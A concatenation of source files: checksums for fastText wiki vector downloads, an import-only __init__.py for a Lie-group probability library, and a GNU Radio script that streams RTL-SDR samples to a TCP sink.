"3020c26e32238ba95a933926763b5c693bf7793bf0c722055cecda1e0283578c",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.diq.vec":
"6f71204e521e03ae70b4bd8a41c50cc72cd4b8c3e242a4ab5c77670603df1b42",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.dty.vec":
"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.dv.vec":
"2b4f19bfcf0d38e6ab54e53d752847ab60f4880bae955fff2c485135e923501e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.dsb.vec":
"ed6699709e0e2f2e3b4a4e32ef3f98f0ccb3f1fed2dad41b7a6deafdc2b32acf",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.el.vec":
"a397de14c637f0b843fcda8724b406f5a7fe9f3ead7f02cfcaeed43858212da6",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.en.vec":
"ba5420ac217fb34f15f58ded0d911a4370dfb1f3341fa7511a49ae74c87de282",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.eml.vec":
"a81f0a05c9d3ffd310f6e2d864ee48bff952dbfb2612293b58ab7bc49755cfe6",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.es.vec":
"cf2e9a1976055a18ad358fb0331bc5f9b2e8541d6d4903b562a63b60f3ae392e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.et.vec":
"de15792f8373f27f1053eef28cff4c782c4b440fd57a3472af38e5bf94eafda6",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.eo.vec":
"a137201c5cf54e218b6bb0bac540beaee2e81e285bf9c59c0d57e0a85e3353c0",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.fi.vec":
"63017414860020f7409d31c8b65c1f8ed0a64fe11224d4e82e17667ce0fbd0c5",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.fa.vec":
"da0250d60d159820bf0830499168c2f4f1eaffe74f1508c579ca9b41bae6c53f",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.eu.vec":
"93f6e44742ea43ff11b5da4c634ebf73f3b1aa3e9485d43eb27bd5ee3979b657",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ilo.vec":
"e20ac3c7ef6a076315f15d9c326e93b22c2d5eee6bec5caef7bab6faf691b13a",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.frr.vec":
"a39b393261a8a5c19d97f6a085669daa9e0b9a0cab0b5cf5f7cb23f6084c35e0",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ga.vec":
"7b33e77e9feb32a6ce2f85ab449516294a616267173c6bbf8f1de5c2b2885699",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.fy.vec":
"07b695f598e2d51cdd17359814b32f15c56f5beaa7a6b49f69de835e13a212b8",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.fr.vec":
"bc68b0703375da9e81c3c11d0c28f3f8375dd944c209e697c4075e579455ac2a",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.gd.vec":
"464e8b97a8b262352a0dc663aa22f98fc0c3f9e7134a749644ad07249dbd42e8",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.gn.vec":
"5d2ac06649f6199ffad8480efa03f97d2910d1501a4528bfb013524d6f2d6c2b",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.gl.vec":
"b4b6233b0c650f9d665e5c8aa372f8745d1a40868f93ecf87f026c60b2bb0f9e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.gu.vec":
"910296b888e17416e9af43f636f83bbe0b81da68b5e62139ab9c06671dbbacf1",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.gom.vec":
"20f38a650e90a372a92a1680c6a92fc1d89c21cd41835c8d0e5e42f30d52b7ec",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.hi.vec":
"e5ec503a898207e17a7681d97876607b0481384b6c1cc4c9c6b6aaba7ad293d0",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.gv.vec":
"b9d6384219d999e43f66ace6decd80eb6359e0956c61cb7049021b194c269ffe",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.he.vec":
"5d861a705bf541671c0cee731c1b71f6a65d8defd3df2978a7f83e8b0580903b",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.hif.vec":
"445e65668be650f419e0a14791b95c89c3f4142d32371501e53038749eb2c71c",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.hsb.vec":
"27be86ce2435dfeb07d76d406a8ec7b46ebf9b6b8fb5da24208eca1492ffe5bb",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.hr.vec":
"4d42787554747a86253a23e9a830a8571faea0b622e48ed136f8b9817dea9da3",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ht.vec":
"be5e089f22a43ca00a35467545bc6cca15b5c5951ac34c504a23686ab735e995",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.hy.vec":
"63dc48faeb4f3c5ea2e6f78a0bf4d8bf3d623af52b7f3a9b9e5984dbc79ba66f",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.hu.vec":
"766de324b4783fe2d31df8f78966ea088712a981b6b0b5336bc71938773fe21e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ia.vec":
"1ec19501030cafa0fdccf7f4c5794f4cd7e795b015330f6ea6bc9eff97eaeca5",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ie.vec":
"41c9e34f5445c4aafd7f5d52665b9aa89fb3c76b5262e9401d21b58dd2e53609",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.id.vec":
"436180ac3d405eefe8c2be20ae3e67cddc866afb94e486afcbaef549c24b7d60",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.io.vec":
"2bedf13a6d751ad5191474e65b6104fa3175ca4c3f9ade214f25cfeede1c9c8c",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.is.vec":
"7fe6d8eca113e245ea5467e8f4cab9697dff1d623ac0a8e6fdaca0a93d7fc6f3",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.it.vec":
"5a9d111edd3f199e7379373ba18f4e5317c6c6c5053a9d6d0a56f32298d3bde4",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ja.vec":
"b44b2eef8bdcf0739c971c4ff7fcae7a300b5e06cf0e50c5787082957ad9d998",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.jv.vec":
"4a46ac08781861d6e19fcc70a421340b627889a054279dacee0f32ee12b1f4f7",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.jbo.vec":
"766c0eb15b1e2cad9a14d0a0937e859e20f6f2ed203ff7ba4f3c70d3b1888d2b",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ka.vec":
"10b08b9372ef6e44e0e826e6a8d01b3396a319d78ce2db990c51d688c2d0259e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.kk.vec":
"2dabc86ed917ba236c96c8c327aa3394f32ea511068a9dce205a46923c5716d1",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.kn.vec":
"7f9ab4985e0d5f91462fbdcbfbfaeef619d973e638fbc7c928cfcc5bd37d473b",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.km.vec":
"bf35b294d86fceac916feee3e167fe6aee3fe73380f78e5377c94ff0d023b77c",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ko.vec":
"44bae904dd7923d1178e83067cc42d9437097f7e86cb83bdd8281febe4b9adaa",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.krc.vec":
"b0ff031a60938b612f9b0c9612bd206cbb1f5288a6ee3482d116174b81d9269f",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.kv.vec":
"a6202b11f869683ce75e60bf206c230109f91b651801dc6ea07b3b7f2c5c9b32",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.kw.vec":
"061e26d970aa7cb3fded9278372a53d0dd8359abc664caa385edaac9aac1359d",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ku.vec":
"7f117b704d5ac791463796b1ac2d833717c0cfc75dbfb50c2e80aa0c9348c448",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ky.vec":
"adb5c72c47c514cd5417f46f8a7baba4061063b0e75c2d0b2e42dc08144af6cf",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.lb.vec":
"566334801777746bc2c1076e1b24a8281e10fe31f0db30a2a4b0b490033e6d04",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.li.vec":
"50a1054a31a7e11f5bd3fe980e1646205284e540fb1be3ae88f4bf16b0d10301",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.lez.vec":
"109c3f3fee8970cfab1b7152315816284aa4b5788403d4007866ad417a63b5e6",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.la.vec":
"ca3b46e03bebf6b937cd7f01c29566b7d48d94d3de033a527ce45744a40ea00a",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.lo.vec":
"acd1a8cbabbfc50196cb3dfeb9e82c71409c40ae90dc3485044396bbb7350431",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.lmo.vec":
"26952850a5569e8241d1e6ff2d6877fa51b6715e8fdeec9bf5f9d716e94c958e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.lt.vec":
"54bc7d3c1ef600f4710047c4dafd1346e8b53bd29a327bc132f6a9fd0c14b8c7",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.lrc.vec":
"24d6c530275176cb03e566e9e5737a1680e79854e6c0a2da19a7cb27a029a0ce",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.lv.vec":
"ed93e318306e19cc18154b095a2494d94ab061009c3a8fa1c3501495f81b7198",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mg.vec":
"12ab899108b74bbee8b685ed7f4941719485560c7346875a0be79c7ba6dbec2a",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mai.vec":
"387a5d1194e8e441b09c7a215a71cad75e6e1a0777c08f90b2ed5bf4e90423d3",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mhr.vec":
"080cb31ff85f0bc21ae75b66311214d594f76a7fdf17699aa5ba8239c6ccd164",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mk.vec":
"ea3d8e77ba3cf17c516e7d0c93e45a73a5e54b1b245ddb65351826678fe102d1",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.min.vec":
"13fac5abbd2053365c5570edea2017e2a6d814e682a8e906d92b3deaa761b741",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ml.vec":
"69eafbab72db69278acec01ff8883d41d616f8aaa59e473faafc115996db5898",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mn.vec":
"a1ec46e780d2f42633ffbe363ce17b1f700fa6744ce40b5a19446a714b9066d8",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mr.vec":
"e30ee3d90d6687868cc6dee609e4d487b81362ea231e8456f8265bace55c7ffb",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ms.vec":
"71ebc8bc0959a592e071db35995119ee33fc17ff61611e6ea09ea6736b317f17",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mrj.vec":
"93351fb85f38523fbf3767fac32625f26be37582afbddfef258642f4530f4ab9",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.my.vec":
"5a8216d0df2d70e5517bcb4cbe523fc03d34f802a83d04a88faadfff7b700b9f",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mwl.vec":
"6997a71b0a745c124135d6c52196d14412d4068fca8aa13b2b3b9598b933cf38",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mt.vec":
"f07a6071fcb3bcda4c6c5e6a0ebe6f3f5d228e8c1fc7ef5160cc3dd098718e98",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.myv.vec":
"ffebdb940b95fe76f3885e8853f3d88ebf9a23c24f64ccdf52c9a269a3f4d459",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.nah.vec":
"2b1fc52e4a4901d824070d1e5fc2196f33c6d787edb8ce3732ace1d05407788e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mzn.vec":
"692f68fa5537a690720f9c2ce0a2c5edaa0d06fe04b2749d169a178aecf751ad",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.nap.vec":
"954aa926c6d47882c2397997d57a8afde3e0ca851a42b07280d6e465577f6925",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ne.vec":
"8d4bf875ca4733d022d4f415777dc2f9e33a93ddc67361add30aed298bc41bc6",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.nds.vec":
"767dcf37a6018cce9f885b31b3c54671199c0f9554ffb09112130b62144556db",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.nl.vec":
"d0601975d00d672ad03a3b146c13c4b6240111d286834e385853e2a25f4fb66a",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.new.vec":
"b7328d5408d91bbdc7ee7a9fd6761af322ea8ddb35a405a60826a5b7e327dd29",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.nn.vec":
"c2d2617c932bb49ba64bea9396435ce882fc4238e3983081967658891d18309e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.no.vec":
"762670d35c29910a0daa86444a1b32d4fd9c94deff82c53abe751c5463dcb025",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.or.vec":
"b1d97ba3d93b37903266b551e164fc9e51c7d5a429e77330cb281fb7de28bd71",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.os.vec":
"c249450a7cb5750c39a9121658b91055a0f5cccfe67c1879706a8bced390bebd",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.oc.vec":
"a4bb95b2fc28e82c5c976af32d632e5241daeeaea2bca2cb3300ad036619c0f6",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.pam.vec":
"b0dd33c3f7e85805b1937d95d73194f3834f40a43a92c12544911ab30818cd20",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.pa.vec":
"61462550fac53d8156c2e61f738b63ef0639949b87d8abeb566194dc86b1a488",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.pl.vec":
"9c2674431e796595c8c1d3b5e1a941c7e833d23cad223d6e4d1c36447af5f3cc",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.pfl.vec":
"889a62dbb945033bfc53516b976042df7791c0aa8290dcb92f12240685d2d2c1",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.pnb.vec":
"7c26c9297b15a75bb1f2bfeb8f11dd3c55821a06bd64fe7a105699ed4d9d794a",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ps.vec":
"e718dfda7790cb309e37f0d42400afebf6036aa018dcd7eb330d576bb5c55030",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.qu.vec":
"b71076861dc0221acf540d4abbf6e760a2871c2dc380556fc7bad402d26ec738",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.pms.vec":
"33a90387e8b75c09980b4c80171cabaae38e9b87de7bf320ecd93c344afaeb39",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.rm.vec":
"9a7f0690c8b42c96a1ad50bb8e7da5d69a3a9f7f0676289243319553a10aac41",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ro.vec":
"e19b3e99a6eae03c15dc5f5d7385beb2540528ee102501499b7ca846c2687d83",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.pt.vec":
"bffbfcafb9f004f13f1be12fa0201c5011324b14a52c2996ae2b97f268819e0c",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.rue.vec":
"cb0aa15cb7816337509ed1b95c8844928a38d29e392e4e5295f35593e633b222",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sa.vec":
"6a303056d4841496599595be06fdcdf28ab5a2fc611c3428d95a3af9d4df0067",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ru.vec":
"9567b90e037c459eb4be4c2a47a04fffbfd5b0d01b84baf86b16535f0dc3728e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sah.vec":
"670a7c98a6c4bf6444b1a26213a5c8114d41c68006b4f32f6dee96558494076d",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sc.vec":
"52abeb74f579f53b3c8bb55ae5cd8bbf8878c7083e61c693c0f7c8d289e80248",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.scn.vec":
"ad8e57aba916c6ab571157c02098ad1519c8f6ce1e72f35538efe1cb488a1a25",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sd.vec":
"7906a45f27aa65ba3d5cb034f56d2852d54d9ec3301b9df345f1a12a6cef9d7a",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sco.vec":
"eafc948e3e9e20aac5e7986979b3b3275c1acb2944e07b9b58d964da61408ff7",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sh.vec":
"36dc95a0fc0de137421df0b86eb7c55faff04d30b26969ae1fa331631824276d",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sk.vec":
"dd9f51e48a55fe63c5cf901c9ce0bd6baab249ac51135a1b4cdb4e12f164687b",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sl.vec":
"2ab76744a9d5321b6709b4ff379fb10495e004f72f6f221965028d6ee1cffd1e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.so.vec":
"28025afd6be6c8166898af85eb33536b111753fbf30e363beb7c064674c6d3c4",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.si.vec":
"112246c583380fcf367932b55e5d42d5ffc12b8c206f981deae24fd4c61b7416",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sq.vec":
"4b4850d700aa1674e44bf733d6e2f83763b1ce9f0e7dfd524eb2c1b29c782631",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sr.vec":
"713f24f861cf540e3e28882915a89023cde222b6edb28fac7fb45b9bd894042e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sv.vec":
"d21b96312bcf64faf1cd972d6eff44cd4a5afc575ff5c8f9b31d2d8819f56fca",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.su.vec":
"b763d1c6471320b071ad2009a82dc6fb0ffeaf07319562438f84cfcb2718e2a4",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sw.vec":
"b9e17565d44cfba3c120274fd359b371c3b8d969b973e77ada3357defa843c79",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.te.vec":
"2d684ba8af330a716f732f9581c7faee80322232e02713d441130f304af8a897",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.tg.vec":
"e2ed18d08da76bff25f2170452365aa341e967114a45271a8ba8d9cefc062aef",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.th.vec":
"079fadf992d34ae885ce5d7c23baa10aea4ee971147993b007d8bf0557906a18",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ta.vec":
"a3cedbf2ce4adb5a8b3688539ef37c6c59047d8d20ffd74e2e384ffcac588ac1",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.tk.vec":
"05f0ccf5f6a2bdf6073e16f11c7a2327ebe4d12610af44051872d4fea32591ec",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.tl.vec":
"a524621cefca337c5b83e6a2849afd12100fcd59bd7f3b228bddb4fb95cb17ea",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.tr.vec":
"4cf567dbb73053bb7b08370e89ec6a7c5626e397e71de99637e70c68ba4c71d9",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.tt.vec":
"6dc86b913c0375b204f1c8d7c8543d80888030693ed4ebef10c75e358c17d0fa",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.tyv.vec":
"b8a687337b3e7f344b9aecff19306c7a1cb432cdc03b46fd2f2e9e376be3073c",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.uk.vec":
"186523ce3be943f9ecae127155371c494192564d1dffe743ab5db8ba28e50874",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ug.vec":
"04184a3a6be245e55f09c04856acc14f687adc4b802aaf875bf5883a1669a856",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ur.vec":
"df38c3cf123edf09366f47ea694c02dec59929df218ca81d5aa69d77552b6865",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.uz.vec":
"f6289fa8cf2ff936a1716a5cf8fd07da46907af26b1236403a292273f2d8fb55",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.vec.vec":
"c6d786f4231f30b4116a8dce181b2513b40b55a654c60793a5c0566152287aeb",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.vls.vec":
"2f430e1d83f0f00fef517f7d35505bcf1445dc7de0db4f051ae7315f1bb0647b",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.vep.vec":
"81268d74e29bbae9f166d523151d12c246ff26be9cd680344faece7e1ca97ebe",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.vi.vec":
"206206d496697de7e96c69500e926014c9f71c7115c3844350766ced21d7003f",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.war.vec":
"51b58d0ace2779b17b88a5b51847a813042e2b018ada573e0bce5a093da5ff4d",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.wa.vec":
"37aee21a768a5883f6bee4a486040883224a93619b8b03dcefb1e939b655cd1c",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.vo.vec":
"4fa6a6ff897a1a49470861d343792feac0ca16e02e9ed1917f1506245ac28b2d",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.wuu.vec":
"09a619a8ef25392bf8905d741cdb63922a115e05b38f56de27c339985691c5d2",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.xal.vec":
"bf9ad172c55d8910e0156953158a9cb1f9cbcc6b9b1e78cf09c123d3409af5e3",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.yi.vec":
"75dc1cad2a4dad5ad7d7723ef0b8e87abe3f4b799e9c38c54f4afe51d916a82b",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.yo.vec":
"c8aa49859debb8b3d1568bb510e12814d55ce5994f0cc6dc43ca9b2c4f739946",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.xmf.vec":
"94ffed6fc1123523d72e3b92d0d3cc5513c116b9e9b2bba5d8b47f7b6fce6abd",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.yue.vec":
"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.zh.vec":
"76f72bd13269ae492715415ef62afb109046ce557f5af24e822b71f9b9360bef"
}
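The mapping above pairs each fastText vector download URL with its expected SHA-256 digest. A minimal sketch of how such a table could be used to verify a downloaded file — the `CHECKSUMS` subset, `sha256_of`, and `is_valid` names here are illustrative, not part of any real downloader API:

```python
import hashlib

# Illustrative subset of the URL -> SHA-256 table above.
CHECKSUMS = {
    "https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.fr.vec":
        "bc68b0703375da9e81c3c11d0c28f3f8375dd944c209e697c4075e579455ac2a",
}

def sha256_of(data: bytes) -> str:
    """Return the hex SHA-256 digest of a byte string."""
    return hashlib.sha256(data).hexdigest()

def is_valid(url: str, data: bytes) -> bool:
    """Check downloaded bytes against the expected digest for `url`."""
    expected = CHECKSUMS.get(url)
    return expected is not None and sha256_of(data) == expected
```

Note that the digest recorded for `wiki.yue.vec` above (`e3b0c442…`) is the SHA-256 of an empty byte string, suggesting that entry was computed from a zero-byte file.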

# File: relie/__init__.py | repo: pimdh/relie | license: MIT

from .local_diffeo_transform import LocalDiffeoTransform
from .local_diffeo_transformed_distribution import LocalDiffeoTransformedDistribution
from .lie_multipy_transform import (
LieMultiplyTransform,
SO3MultiplyTransform,
SE3MultiplyTransform,
)
from .so3_exp_transform import (
SO3ExpTransform,
SO3ExpCompactTransform,
SO3ExpBijectiveTransform,
)
from .so3_prior import SO3Prior

# File: src/urh/dev/gr/scripts/rtl-sdr_recv.py | repo: awesome-archive/urh | license: Apache-2.0

#!/usr/bin/env python2
##################################################
# GNU Radio Python Flow Graph
# Title: Top Block
# Generated: Fri Aug 21 15:56:13 2015
##################################################
from optparse import OptionParser
from gnuradio import gr
from gnuradio.eng_option import eng_option
from grc_gnuradio import blks2 as grc_blks2
from InputHandlerThread import InputHandlerThread
import osmosdr
class top_block(gr.top_block):
def __init__(self, samp_rate, freq, gain, bw, port):
gr.top_block.__init__(self, "Top Block")
##################################################
# Variables
##################################################
self.samp_rate = samp_rate
self.gain = gain
self.freq = freq
self.bw = bw
##################################################
# Blocks
##################################################
        self.osmosdr_source_0 = osmosdr.source(args="numchan=" + str(1) + " " + "rtl")
self.osmosdr_source_0.set_sample_rate(samp_rate)
self.osmosdr_source_0.set_center_freq(freq, 0)
self.osmosdr_source_0.set_freq_corr(0, 0)
self.osmosdr_source_0.set_dc_offset_mode(0, 0)
self.osmosdr_source_0.set_iq_balance_mode(0, 0)
self.osmosdr_source_0.set_gain_mode(False, 0)
self.osmosdr_source_0.set_gain(gain, 0)
self.osmosdr_source_0.set_if_gain(gain, 0)
self.osmosdr_source_0.set_bb_gain(gain, 0)
self.osmosdr_source_0.set_antenna("", 0)
self.osmosdr_source_0.set_bandwidth(bw, 0)
self.blks2_tcp_sink_0 = grc_blks2.tcp_sink(
itemsize=gr.sizeof_gr_complex * 1,
            addr="",  # previously 127.0.0.1
port=port,
server=True,
)
##################################################
# Connections
##################################################
self.connect((self.osmosdr_source_0, 0), (self.blks2_tcp_sink_0, 0))
def get_samp_rate(self):
return self.samp_rate
def set_samp_rate(self, samp_rate):
self.samp_rate = samp_rate
self.osmosdr_source_0.set_sample_rate(self.samp_rate)
def get_gain(self):
return self.gain
def set_gain(self, gain):
self.gain = gain
self.osmosdr_source_0.set_gain(self.gain, 0)
self.osmosdr_source_0.set_if_gain(self.gain, 0)
self.osmosdr_source_0.set_bb_gain(self.gain, 0)
def get_freq(self):
return self.freq
def set_freq(self, freq):
self.freq = freq
self.osmosdr_source_0.set_center_freq(self.freq, 0)
def get_bw(self):
return self.bw
def set_bw(self, bw):
self.bw = bw
self.osmosdr_source_0.set_bandwidth(self.bw, 0)
if __name__ == '__main__':
parser = OptionParser(option_class=eng_option, usage="%prog: [options]")
parser.add_option("-s", "--samplerate", dest="samplerate", help="Sample Rate", default=100000)
parser.add_option("-f", "--freq", dest="freq", help="Frequency", default=433000)
parser.add_option("-g", "--gain", dest="gain", help="Gain", default=30)
parser.add_option("-b", "--bandwidth", dest="bw", help="Bandwidth", default=200000)
parser.add_option("-p", "--port", dest="port", help="Port", default=1337)
(options, args) = parser.parse_args()
tb = top_block(float(options.samplerate), float(options.freq), int(options.gain),
float(options.bw), int(options.port))
iht = InputHandlerThread(tb)
iht.start()
tb.start()
tb.wait()
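# The option handling in the __main__ block above can be exercised on its own.
# A minimal sketch of the same optparse setup (Python 3 syntax; optparse still
# ships with the standard library), showing why the script wraps each value in
# float()/int(): command-line values arrive as strings.

```python
from optparse import OptionParser

def build_parser():
    """Mirror of the option definitions in the script above (illustrative)."""
    parser = OptionParser(usage="%prog: [options]")
    parser.add_option("-s", "--samplerate", dest="samplerate", help="Sample Rate", default=100000)
    parser.add_option("-f", "--freq", dest="freq", help="Frequency", default=433000)
    parser.add_option("-g", "--gain", dest="gain", help="Gain", default=30)
    parser.add_option("-b", "--bandwidth", dest="bw", help="Bandwidth", default=200000)
    parser.add_option("-p", "--port", dest="port", help="Port", default=1337)
    return parser

# Values given on the command line are strings, hence the float()/int()
# conversions when constructing top_block in the script above.
options, args = build_parser().parse_args(["-f", "433920000", "-p", "2000"])
```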

# File: ocdskingfisher/sources/digiwhist_greece.py | repo: odscjames/lhs-alpha | license: BSD-3-Clause

